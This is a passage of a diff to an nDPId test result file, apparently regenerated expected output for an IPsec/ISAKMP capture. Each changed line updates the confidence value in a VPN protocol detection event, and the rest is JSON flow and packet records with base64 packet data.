00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":946763513021,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763513021,"pkt":"YDjgxTWgeJS0JASgCABFAADsmwgAAPcRO31t7buBwKgCZBGUOKQA2N42AAAAAPMxpfyYl9\/WLu8pUwPoTCguICMgAAAAAQAAAMwkAACwrhQ09Kh9+vnX5erplPpmkKxPU2ZyQ3UgWfgQd6t7a0GXP0QOt30giqAFHmWpPWeR9yE+jQc3kUdw92Kry8GP93GHU3JiQfdGX1dg80oiDVCCJN9VDUT9EYrK5BIf8TxxSxrHgnnGPhNiTcvbLhdqWqrhM+DCMWmbIQOLUP\/13aUdQqtJ2NskdLYZmBzVkSARdH\/nvMVxKh8rTWuRQL2HLCcM9jppc\/gTtn8O8w=="} 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":946763513596,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763513596,"pkt":"eJS0JASgYDjgxTWgCABFAACMtaJAAD8RmUPAqAJkbe27gTikEZQAeLpaAAAAAPMxpfyYl9\/WLu8pUwPoTCguICMIAAAAAgAAAGwwAABQwOqdhYCbmm3bEKgkQ2BLZDzIv0XnrqQcxKkQyJsdMpetHDv3PBx9ZFaXf97NlAImLdQie\/fZWDwYC39ckJH2101yaGOEgl6g\/\/96sQ=="} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946756085796,"flow_last_seen":946756088542,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1108,"flow_tot_l4_payload_len":8628,"flow_avg_l4_payload_len":575,"midstream":0,"thread_ts_msec":946763514604,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946756088542,"flow_last_seen":946756088542,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":2206,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":946763514604,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946756085796,"flow_last_seen":946756088542,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1108,"flow_tot_l4_payload_len":8628,"flow_avg_l4_payload_len":575,"midstream":0,"thread_ts_msec":946763514604,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946756088542,"flow_last_seen":946756088542,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":2206,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":946763514604,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAMkRHVAAD8RB3nAqAJkbe274SkEAfQDEJ0jqPaH0PrOV4AAAAAAAAAAACEgIggAAAAAAAADCCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAK+c8+AkD6rcZFQ1EHxMTY+7l0YtUYJhuCyFlB47ITLDTs1tj2Dv2ywfETORYk1UddWMpZ28VbOVXwpbsHVD4m+eunnbYKM0lSoy3ZvZtJJu3j9BZUFhxSVx7oYZQm2Fhl90HdAof8DfDzpeapHwvyRWubmkweX6VdG0E\/7DkO\/tKQAAJAGnwH6v++hzHESJUw8bCbCkyT4PnTZHyjybPJjnO+99KQAAHAAAQARSCoF2MNPWDRowTYoccunou+lcYwAAABwAAEAFHuQrU4s4aNFV7Z3Ww3xyaLVuok4="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQlowAAPcRQDVt7bvhwKgCZAH0KQQAPNm6qPaH0PrOV4AAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAE1BPl4uUkUN6wHNNoiXg=="} 01514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAM8RHlAAD8RB13AqAJkbe274SkEAfQDKDR+qPaH0PrOV4AAAAAAAAAAACkgIggAAAAAAAADICEAABgAAEAGAAE1BPl4uUkUN6wHNNoiXiIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAK+c8+AkD6rcZFQ1EHxMTY+7l0YtUYJhuCyFlB47ITLDTs1tj2Dv2ywfETORYk1UddWMpZ28VbOVXwpbsHVD4m+eunnbYKM0lSoy3ZvZtJJu3j9BZUFhxSVx7oYZQm2Fhl90HdAof8DfDzpeapHwvyRWubmkweX6VdG0E\/7DkO\/tKQAAJAGnwH6v++hzHESJUw8bCbCkyT4PnTZHyjybPJjnO+99KQAAHAAAQARSCoF2MNPWDRowTYoccunou+lcYwAAABwAAEAFHuQrU4s4aNFV7Z3Ww3xyaLVuok4="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAANMRIBAAD8RB0bAqAJkbe274TikEZQDOJLkAAAAAKj2h9D6zleA3PDVMwKwDlEuICMIAAAAAQAAAywjAAMQ6YVobOiOu33lHVWElEunhb8i2YZ6SJ6aiLTcy0AggCQBgmcGPrbPQY+7CyG+MW\/zcDNSXNBVRgcl+deLN7pzzs+edQXQ3ymGuVucG8sedQYPWDKO0pqk+WM6U5cUWyUwI520rK2ioSJuEJdkCV3H7iyVihwVeD6c\/gw1l7DnABgddfgZZJ9zW8MF3fUS1Tzq9vNJVaWh3fAM9FMonpojpGyoxg8OOU62zE4VpWKEFj7\/WCmeuJzkx7j4rDg\/EvSq8oPo0td4HMxf1v7D7OS9vWscu7yIUVqSIDiZVbRJdDlYIbjNBcbPVNC6rFFyZPwnJX+Sh\/NZ5M10UIrHb02GQuXG4JuneW37Hzb9m5Cp0+NC\/rDSY6HIRy+PnBclndEKyb6rikYqvC9ulduFy08fbSqqMc+W4y2oTJ0OJG\/KcjYhz1txaibqAhCVAdArR11jotDvqMhm8B5EPsPrKUZp\/oqYtEtsJeBbOJDGx5fcs3Dc8xXqjhdL+atBY9dD5lX465\/aFYZrs\/p\/6tpwIqcY9Kz6JWmIB7Ve\/zKJ+poA1ggacxynpwGPIpjTkfpV1mpuPxXZOMKK9C6Sl0CzhvRHoiE9gxWSRt1Gbt0X94muIv8kCRbQpLO7GDlVVgW3yzIi1md9zzccRm+nVa7dqhbOeAj8kyoSyaHPBXZsWaB6ILEMd00K9DkZuIoJLhwtBdlKv+Y1yax7rP\/MCkCeq5\/ZogHpuRj0FnYT10WvjcqHmOuB8VG7UTXBZoq54RfhcZ7lR5s5oIy7t2S35f4DoZ8P9M9fsPffiYLS2ed4BehFN7g0VYMbUcBh4Ie9PrZuyHxRP9gLqCl04Yv6i5Nxms2GpDotE7U8zZO4S0CkjrFAUapBHjVeIzFFwvAZPvh9aY1gC0gxCsnPsS654+yD5keYzPvguogftu0HZqonVZnxJHFQ68wNssOgq7BjiGTrLmx\/9oXNTzhrxTFBoFV8LxISGtB0MAIfYYOzRkywsn+C361lzTXVciyQzka\/CKfBpLXscRaSL3Tm4Z8cEfDx"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADslpIAAPcRP5Nt7bvhwKgCZBGUOKQA2OOJAAAAAKj2h9D6zleA3PDVMwKwDlEuICMgAAAAAQAAAMwkAACwLCsD4mosZGmzS9zPOH7ZB3ntKXsbrg1mTaPeWquGkKyWCRF\/OjCDE2AY7gF6+QP5GKPQ0TXBpQE1YOldvNsFNdgrlAg6Fv3aay4aOWg5YoteQM9smeql\/l\/giTcrHwj6FXV0oSRjjlv74o0goNnCWGoPIRvxv9V1EQzAD2EbVa5quQlRJ4P625uNjcSoEn1nGktCsRV4BUtWTyE9paAe2sVXXtJL9tj6EzoDGA=="} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMRPlAAD8RCY3AqAJkbe274TikEZQAeAhnAAAAAKj2h9D6zleA3PDVMwKwDlEuICMIAAAAAgAAAGwwAABQK27EVha44rT9dN9Ez3hFDAHW67\/DhEXLrtd9m2PGXusgAv2XsLrDq2JDhD6iOu+y5vuPRE4mc3OgV68O6by2edSn68oqDfBe7nI7rA=="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAMkzlFAAD8RffrAqAJkbe27gykEAfQDEKa1KYaJu7sMZisAAAAAAAAAACEgIggAAAAAAAADCCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAGpCZr8Tv7ACFVYgEqbzY1sve\/t1Siu9b8W\/hW3A6qtZkFYJVqadJiegm4pTvb26NMogwWUUtlWP\/qXODduSwhTwXP6iamDIHfg7Kn8X7hJR1pWXwVD71FiTJIOEYsmUyWmeEzqeC\/zu9xyGvUwbXmmArHQnjp6qSMSG48GBhCPWKQAAJLIBpPNgAmeSE9fKixZPfFEcqSeQBPvHP6x66fS8zQquKQAAHAAAQAS\/TJNdm1WLlcpcz5LBQYclk\/CNqgAAABwAAEAFBKHvxsW9p663xQuBned6yuZ3rpo="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQ4hQAAPcR9Qpt7buDwKgCZAH0KQQAPL3CKYaJu7sMZisAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAAAAN01S7xqKstfAW9qRg=="} 01518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAM8zltAAD8RfdjAqAJkbe27gykEAfQDKHMdKYaJu7sMZisAAAAAAAAAACkgIggAAAAAAAADICEAABgAAEAGAAAAAN01S7xqKstfAW9qRiIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAGpCZr8Tv7ACFVYgEqbzY1sve\/t1Siu9b8W\/hW3A6qtZkFYJVqadJiegm4pTvb26NMogwWUUtlWP\/qXODduSwhTwXP6iamDIHfg7Kn8X7hJR1pWXwVD71FiTJIOEYsmUyWmeEzqeC\/zu9xyGvUwbXmmArHQnjp6qSMSG48GBhCPWKQAAJLIBpPNgAmeSE9fKixZPfFEcqSeQBPvHP6x66fS8zQquKQAAHAAAQAS\/TJNdm1WLlcpcz5LBQYclk\/CNqgAAABwAAEAFBKHvxsW9p663xQuBned6yuZ3rpo="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAANMzmhAAD8RfbvAqAJkbe27gzikEZQDOADEAAAAACmGibu7DGYryhiyRAKATQQuICMIAAAAAQAAAywjAAMQZHFfe\/8gnlR9qJ0XaigXc9ecoTEZTuVsV0qwxi1bRmdUpRcmSBOWNxBIo2zQZ87GT5G751nPElifTD02EvouEj5E5IQU0FGRIhZ7j3qicVbY1wYyM\/7b1kU+HFfeN7SZMjoFTbYpGpJMyjo3p7WV9lo5KoSnKHXuqJzQ5nWXXLqoPnImrLh+kUU67ZunIK6VGLaaD26XDMyO1detKNvu1xLMeDpFOrXgfROvyaM9mL6Qy0JMYkrFGQs6WLijsBx4j\/ypSFeU1mK2Vr4A2MyTdCX7gE7xdlnxD\/rDmJq9DKSjw38y9hbHdhc\/iY0C3nab6VMj+faSuxTiCN\/k95tmK9YlLu5z4MBIqehxNJvZVRo81XV1kO7D5ru0vQvX7cf0tIT9J14ZYj8GqLetMyXACimFrfsXJ+6fD8oXSvqO2D+TedvHL5uV5cQrYHYI3QtPsDIWRMZPu5wXI4zhSjHAUEHv3INsh0GXRCrYoJpzT5YRLAft176LjvYcBHlxGNPvZCE5t2KjYWhLWQQobkebJPDR6xT5pWmZYI9ueRBO3TvQgcZ\/hat5kGnreXGQ7iSfmvWGkfCPmPXFjh+kvXrIjh90ar8VUv+1Tytqs8wvbuQfCT0bqBnnQ0wHKmtGq+4zQe4HDQvdl1HvTuPid6itVPTZoVBuPAcHNUp0hFnsdCMDDpdm1FgfLJPXwToQnXDA2c\/JNhXZKH3mmim+MdOrjsCGgwt3Y1PkgYXOqaNOBSgE11Jy1RZvQ0\/5Hy1Z72\/5lItMJ7ICcH3gglKIhMYdmBSVMJkRCVNHMRGt4jsWV0WPzR8MoKLhDtNokirzAqbw68gQkQ4PGqIS+Q4J+oTZGYKlEpvlzNrt0Q3wyGUpaedIPOGbUXuZYVlB1CLx+A4lyyTt\/3dhRpqLAUV2OXUyLrXyBVr85YOJkK5xMpNsiocbPntT9F8wlEGHEtgW60+VK